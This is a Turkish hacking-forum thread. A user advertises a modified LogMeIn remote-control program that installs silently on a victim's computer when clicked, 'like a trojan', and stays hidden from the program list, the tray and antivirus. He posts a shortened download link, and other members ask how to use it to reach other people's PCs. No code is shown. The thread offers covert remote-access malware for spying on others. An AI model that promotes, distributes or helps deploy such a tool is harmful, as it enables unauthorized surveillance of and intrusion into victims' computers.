Şokk.!!karşı pc yi naklen izlee

haxe

Üye
30 Tem 2008
166
3
Slm arkadaşlar şimdi sizlere kendi editlediğim logmein programından bahsetmek isdiyorum logmein programını kullananlar bilir aslında program yasal bir uzakdan pc kontrol programıdır ama programı kullanabilmek için karşıdaki bilgisayara kurdurmanız gerekiyor ve size şifresini söylemesi gerekiyor. Şimdi bu benim yapdığım programda ise hiç bir ayar şifre vs. yapmadan sadece tıklandığı anda bilgisayara sessiz sedasız bir trojan mantığı ile kuruluyor ve dahası;

1.Program ekle kaldırda görünmüyor
2.Program files içinde görünmüyor
3.Sağ alt köşede çıkan ikon görünmüyor
4.Hiç bir antivirüs tarafından tanınmıyor
5.Program boyutu sadece 215 kb

https://tik.lat/NRf9d

Emeğe SaYg!

@AĞDA$

Yeni üye
10 May 2009
20
0
kardeş sen logmainden bahsediyon heralde ama inşallah programını zipin içinde beraber vermişsin yoksa boş boş indirmeyelim program yoksa videoyu ne yapalım

yusf

Yeni üye
16 Tem 2009
11
0
arkadaşım sen kendi pcde server nası açıon logmeinin içinde varmı ben üye olum pcye kurdum hiç kimse yok nası eklicem başkalarını

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.